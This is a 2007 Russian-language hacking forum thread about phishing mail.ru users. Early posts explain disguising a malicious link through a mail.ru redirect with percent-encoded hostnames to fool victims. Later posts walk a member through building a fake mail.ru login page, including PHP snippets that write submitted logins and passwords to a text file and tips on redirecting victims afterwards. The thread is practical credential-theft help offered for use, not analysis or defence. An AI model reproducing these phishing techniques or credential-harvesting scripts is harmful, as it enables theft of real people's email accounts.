Разоблачение http://mai1.pp.ru/ + ещё один общедоступный метод взлома @ mail

Discussion in 'Уязвимости Mail-сервисов' started by Dronga, 25 Feb 2007.

  1. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    799
    Likes Received:
    710
    Reputations:
    301
    Dronga- главный разоблачитель Античата =)
    (А если серьозно то имхо теряються нити темы)\тему почитстил, все разборки в ICQ!!!
     
    #21 Constantine, 28 Feb 2007
    Last edited: 28 Feb 2007
  2. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Твоё право почистить тему, я от темы не ухожу, просто люди не могут честно постучать мне в асю и всё уладить. Так что получается пиар Античата =) Я не разоблачитель, просто так получается.

    Для поддержки темы расскажу про метод о котором уже вспомнил censored!. Для того что бы спрятать линк из письма вовсе не обязательно знать какие-то хитро навороченные скрипты, использовать XSS чтобы суметь их вставить в тело письма... Есть более тривиальный метод =) Это использование редиректа непосредственно от служб mail.ru. Например, внешне, очень сипатичный линк Приведёт вовсе не на mail.ru, как может ожидать потенциальная жертва =)

    Но это пол дела, пока что всё достаточно прозрачно. Чтобы окончательно ввести жертву в заблуждение кодируем www.forum.antichat.ru примерно в такой вид:

    %77%77%77%2E%66%6F%72%75%6D%2E%61%6E%74%69%63%68%61%74%2E%72%75

    И получаем:
    Вот так гораздо лучше =) *всё в одну линию, пробелы убрать.

    Одним секретом меньше =)
    (c)Dronga#Antichat.ru
     
    #22 Dronga, 28 Feb 2007
    Last edited: 1 Mar 2007
    3 people like this.
  3. Retscan

    Retscan Member

    Joined:
    17 Dec 2006
    Messages:
    25
    Likes Received:
    9
    Reputations:
    11
    А такой код фильтры мэйловские пропустят вообще?
     
  4. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    Совневаюсь...
    з/ы спс Dronga правда и не секрет как бы=)
     
  5. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    А чтож ты им не поделился??
    ну если очень хорошо подумать как это правильно сделать, то обязательно пропустят. Если пытаться отправить как есть, то конечно нет.
     
  6. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    Все что я знаю и не видел подобного в паблике,я в паблик не выкладываю....
     
  7. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    401
    Likes Received:
    153
    Reputations:
    80
    Рано или поздно это ктонибудь да выложил... да и основания есть! так бы не крысил...
    http://slil.ru/24027168 - файлы сайта...

    За паролем в личку...
     
    1 person likes this.
  8. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    716
    Likes Received:
    142
    Reputations:
    50
    а мне недавно пришло письмо с просьбой о восстановлении пароля..мол bla-bla-bla мы проипали ваш пароль. вышлите))) признавайтесь, кто такому учил?)))
     
  9. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    643
    Likes Received:
    369
    Reputations:
    -13
    Слушайте, у меня вопрос стоит так, надо сделать аналог этой странице на беспалтном хостинге (джино, 122мб, ту1)
    Страницу то я сделаю, а вот что мне надо что бы пароль сохранился и скоприровался в файлик....
     
  10. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    401
    Likes Received:
    153
    Reputations:
    80
    для аналога страницы сорцы не дам. ибо нефиг!
     
  11. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Вот самый примитивный скрипт, если хоть чуть-чуть в php шаришь, то под себя его легко заточишь =)...

    //--удалено--//


    файлик 1.txt не забудь в папку кинуть...

    ...и название переменных согласуй с переменными с формы...
     
    #31 Iceangel_, 11 Mar 2007
    Last edited: 13 Mar 2007
    1 person likes this.
  12. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    643
    Likes Received:
    369
    Reputations:
    -13
    Страницу сделал,
    в
    Code:
    fputs($file, $HTTP_POST_VARS["Login"]." ".$HTTP_POST_VARS["Password"]."\n")
    Все подкариткировал (как видешь)
    Но в 1.тхт всеравно не сохраняется ничего :/
    Пробовал вместо логин, писать login_from
    но не прокатило, права на тхт файл поставил 777
    Что я ни так сделал?
     
  13. AdvLamer

    AdvLamer Elder - Старейшина

    Joined:
    1 Jan 2006
    Messages:
    228
    Likes Received:
    205
    Reputations:
    112
    Sandjuro
    права вроде на папку на фтп ставятся а не на файл
    может ты через GET данные передаешь?
    исправь HTTP_POST_VARS на _REQUEST
     
    #33 AdvLamer, 11 Mar 2007
    Last edited: 11 Mar 2007
  14. FindeR

    FindeR Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    623
    Likes Received:
    138
    Reputations:
    20
    Sandjuro
    Я уже спрашивал об этом, когда баловался подобными вещами. В разделе "Для веб-мастера" есть.
    Вот скрипт. Не забудь в папке со скриптом создать log.php и поставить права доступа нужные ;)
    PHP:
    <?php
    $username
    =$_GET['username'];
    if (isset(
    $username))
    {
    $log_path="./log.php";
    $log_string=$username."   ";
    $file=fopen($log_path,"a");
    fwrite($file$log_stringstrlen($log_string));
    fclose($file);
    }
    ?>
     
  15. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    643
    Likes Received:
    369
    Reputations:
    -13
    Finder, Спасибо! тока подскажи, где саму страницу вставлять? после закрытия скрипа? (после "?>")
    Если вставляю после тега, то лог.пхп пуст, мне кажется что вместо юзернейм в $log_string=$username." ";
    надо поставить login , я прав?
     
    #35 Petr, 11 Mar 2007
    Last edited: 11 Mar 2007
  16. FindeR

    FindeR Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    623
    Likes Received:
    138
    Reputations:
    20
    Ну, я этот скрипт в конец своей странички запихнул.
    Собсно, а какая разница, где он будет? :)

    PHP:
    $log_string=$username."   ";
    тут username - это имя текстового поля, в которое вводятся данные.
    зы: для log.php права у меня выставлены -rw-r--r--
     
    1 person likes this.
  17. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 Sandjuro
    Внимательно посмотри форму и скрипт, может поймешь почему не получалось...
     
    #37 Iceangel_, 11 Mar 2007
    Last edited: 13 Mar 2007
  18. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    643
    Likes Received:
    369
    Reputations:
    -13
    Iceangel_
    Спасибо! я пхп не учил потому как мог так и мутил! а твой фейк заработал! щя саму хтмл страницу дороботаю маиловскую и сделаю чтобы перекидовыло на открытку :)
     
  19. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 Sandjuro
    Если что, стучись в асю[ 222284836 ], помогу...
     
  20. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    643
    Likes Received:
    369
    Reputations:
    -13
    Как на зло сейчас не имею доступ в аску (но сегодня должен быть там)
    У меня вот такой вопрос появился
    в echo("Системная ошибка");
    если я вставляю ссылку или скрипт но он не работает, я хотел туда подельную страницу с открыткой вставить :)
    это возможно?
     
Loading...